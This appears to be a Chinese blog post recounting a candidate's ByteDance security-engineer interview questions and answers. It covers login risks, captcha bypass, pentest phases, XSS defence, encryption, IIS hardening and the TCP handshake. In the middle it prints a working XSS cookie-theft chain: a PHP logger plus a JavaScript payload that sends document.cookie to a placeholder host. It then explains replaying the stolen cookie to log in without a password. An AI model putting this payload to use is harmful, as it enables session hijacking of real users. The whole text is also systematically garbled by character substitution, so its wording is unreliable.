共计 3612 个字符,预计需要花费 10 分钟才能阅读完成。
前言:
前段时间,有个敌人又进来面试了,这次他面试指标比拟清晰,面的都是业务量大、业务比拟外围的部门。前前后后去了不少公司,几家大厂里,他说给他印象最深的是字节。
3 轮技术面 + 1 轮 HR 面,他最终拿到了 40k*18 薪的 Offer。
第一轮次要考查 Web 平安根底,二、三轮重视对应浸透技术的把握,以及对过往我的项目的业务了解。之所以令他印象粗浅,是因为每轮都聊了一个半小时以上,的确让他受益匪浅。
他最终抉择字节,除了这是外围我的项目之外,还有一个起因,字节的福利号称业内最好,薪资也是同类公司中最高。
“薪资高、倒退好、福利待遇优”仿佛曾经成为字节跳动的标签。
而很多人感觉大厂门槛高:
“渣本双非学历进不了大厂!”
“工作不满 3 年进不了大厂!”
“非科班毕业的,进不了大厂!
可对于我这个渣本双非毕业的敌人来说,进字节,仿佛并没有那么难。用他的话说,进大厂就靠一条:技术实力。
你只有技术实力够好 + 在面试中体现得还不错,就能拿下 Offer。
一面
1、一个登录的页面会存在那些平安问题?
弱口令,爆破,SQL 注入,敏感信息泄露
2. 对那种编程语言最相熟?
这个因为咱们也就最近学过 python,尽管在必修课的时候学过些 java,c++ 但自我感觉还不到能说进口的境地。
3. 用 python 做过那些事件?
好在上个月还用 python 编写了一个简略的 poc,
4. 编写 poc 罕用的库?
re(正则申请库),request(网络申请库)
5. 暴力破解应该怎么防备?
限度登录次数,减少多重认证
6. 验证码有哪些绕过的形式?
绕过验证码。跳过验证码间接拜访须要的页面内容。
申请头中自带验证码。有些网站的验证码会在前台 js 校验服务器生成的验证码会在申请头中。能够获取申请头,并把验证码解析进去。
session 不刷新。有的网站验证码验证胜利后,间接获取申请资源。(遗记了刷新 cookie 对应的验证码)能够事后设定一个 cookie 和验证码。利用这个破绽拜访网站。对于多线程无法控制以及有些网站验证码定期不拜访生效问题。能够增加一个定时拜访程序来解决
利用第三方插件。对于有些网站验证码比较简单。只含阿拉伯数字和英文字母。能够用第三方的插件来辨认。例如:tess4j、tesseract
有些网站的验证码是从库中随机取出一个来的。对于这类动态的验证码。能够本人建设一个验证码动态库。本人建设好图片和验证码答的链接。采纳 map 的映射办法就能够进行辨认。
7. 在 windows 里查看当前目录的命令?
dir
8. 在 linux 查看以后命令?
pwd
9. 查看以后文件的信息和权限
ls -al
10.ctf 当中负责的局部?
我是打辅助的 …
11. 本人是否独立做出 ctf 的题?
当然
退一步讲,就算你不去大厂,但你凡是想在技术之路上走远一点,想成为技术大牛,做大零碎,就必须搞定基础知识。
浸透测试中,从端口扫描、破绽扫描、入侵检测、红队攻打、蓝队进攻等都和网络协议无关,所以浸透测试人员学好基础知识至关重要,是成为大牛的必备技能。
10 个程序员外面,10 个都说本人学过网络安全,9 个说本人懂网络安全。但真正面试的时候,能答复出相干问题的,可能只有两三个。比方:
“TCP 协定跟 UDP 协定有什么区别?”“HTTPS 协定的底层原理是什么?”“阿里的 Dubbo
框架都应用了哪些传输协定和序列化协定?”
想想这些你都能答出来吗?其实,加入过大厂面试的小伙伴应该都分明,无论是国内的互联网大厂还是硅谷的 IT 公司,面试多少会问基础知识常识。
这并不难理解,毕竟大厂更重视程序员的基本功,而且简直所有的程序运行都会波及到网络协议,一旦用错就容易产生灾难性的结果。
举个例子:
很多人都被“技术变动太快,容易过期”所困扰过,从搜索引擎、大数据、云计算到人工智能、区块链 … 等。实际上,很多技术看起来轰轰烈烈,扒下外衣,实质的货色其实就是“计算机组成原理、操作系统、网络协议、数据结构与算法”这些基础知识和外围概念。
不想被滚滚而来的新技术淘汰的方法,就是把握最外围实质的常识。它们不会像“X 天带你搞定
MySQL”这样的内容,更容易帮你找到工作,但正是这些常识,在你 40 岁之后仍然很有价值。
二三面
浸透测试的流程是什么 浸透测试流程概述
后期交互阶段、情报搜集阶段、威逼建模阶段、破绽分析阶段、浸透攻打阶段(Exploitation)、后浸透攻打阶段(怎么始终管制,维持拜访)、报告阶段。
攻打前:网络踩点、网络扫描、网络查点
攻打中:利用破绽信息进行浸透攻打、获取权限
攻打后:后浸透维持攻打、文件拷贝、木马植入、痕迹擦除
xss 如何进攻
1. 对前端输出做过滤和编码:比方只容许输出指定类型的字符,比方电话号格局,注册用户名限度等,输出检 查须要在服务器端实现,在前端实现的限度是容易绕过的;对特殊字符进行过滤和本义;
2. 对输入做过滤和编码:在变量值输入到前端的 HTML 时进行编码和本义;
3. 给要害 cookie 应用 http-only
对称加密 非对称加密?
对称加密:加解密用同一密钥,密钥保护简单 n(n-1)/2,不适宜互联网传输 密钥,加解密效率高。利用于加密数据。
非对称加密:公钥推不出私钥,每个用户一个非对称密钥对就能够,适宜于互联 网传输公钥,然而加密效率低,利用于数字签名及加密
cookie 存在哪里?能够关上吗
C:\Users\ 用户名 \AppData\Roaming\Microsoft\Windows\Cookies 工具 – 文件夹选项 – 查看 – 将暗藏被爱护的文件的对勾去掉就会看到 cookies 文 件夹
xss 如何盗取 cookie?
攻击者代码:
$cookie=$_GET['cookie']; ..
$time=date('Y-m-d g:i:s'); ..
$referer=getenv('HTTP_REFERER'); ..
$cookietxt=fopen('cookie.txt','a'); ..
fwrite($cookietxt,"time:".$time."cookie:".$cookie."referer:".$referer.""); 留神双引号,容易出错 ..
fclose($cookietxt); .. ?
脚本端:
document.write('<img src="http://ip/cookie.php?
cookie='+document.cookie+'" width=0 height=0 border=0 />');
.. </script>
获取到 cookie 后,用 firebug 找到 cookie,新建 cookie 退出 cookie,用 referer 来提交,无需输出帐号密码间接登录进去!
IIS 服务器应该做哪些方面的保护措施:
- 放弃 Windows 降级:
- 应用 IIS 防备工具
- 移除缺省的 Web 站点
- 如果你并不需要 FTP 和 SMTP 服务,请卸载它们
- 有规定地查看你的管理员组和服务:
- 严格控制服务器的写访问权限
- 设置简单的明码
- 缩小 / 排除 Web 服务器上的共享
- 禁用 TCP/IP 协定中的 NetBIOS:
- 应用 TCP 端口阻塞
- 仔细检查.bat 和.exe 文件: 每周搜寻一次 *.bat
- 治理 IIS 目录平安:
- 应用 NTFS 平安:
- 治理用户账户
- 审计你的 Web 服务器:
TCP 握手协定:
在 TCP/IP 协定中,TCP 协定提供牢靠的连贯服务,采纳三次握手建设一个连贯。
第一次握手:建设连贯时,客户端发送 syn 包 (syn=j) 到服务器,并进入 SYN_SEND 状态,期待服务器确认;
第二次握手:服务器收到 syn 包,必须确认客户的 SYN(ack=j+1),同时本人 也发送一个 SYN 包(syn=k),即 SYN+ACK 包,此时服务器进入 SYN_RECV 状态;
第三次握手:客户端收到服务器的 SYN+ACK 包,向服务器发送确认包 ACK(ack=k+1),此包发送结束,客户端和服务器进入 ESTABLISHED 状态,实现三次握手。
DVWA 是如何搭建的?
启动 xampp(XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站 集成软件包。)下的 apache 中间件和 mysql 将 dvwa 放到 xampp 下的 htdocs 目录下 在浏览器输出 http://127.0.0.1/dvwa 即可应用啦!
还有 owasp 的破绽练习平台:https://sourceforge.net/projects/owaspbwa/files/
xss 有 cookie 肯定能够无用户名明码登录吗?
根本能够。因为把 cookie 的值给浏览器,浏览器去拜访页面会用已有的 cookie 去拜访,如果 cookie 无效,就会间接进去。
HR 面
1. 前期倒退布局
2. 筹备在什么时候做出职能的变动。
3. 为客户做平安服务的价值,是如何体现的,帮客户解决什么问题
4. 工作的时候会做到浸透测试、代码审计
高级–破绽扫描
中级–独立浸透测试能力
高级–代码审计我的项目
学习路线图
大厂面经
浸透工具包
网络安全入门到进阶书籍(高清 PDF 版)
SRC 破绽汇总
Web 平安学习视频
应急响应笔记
【材料支付】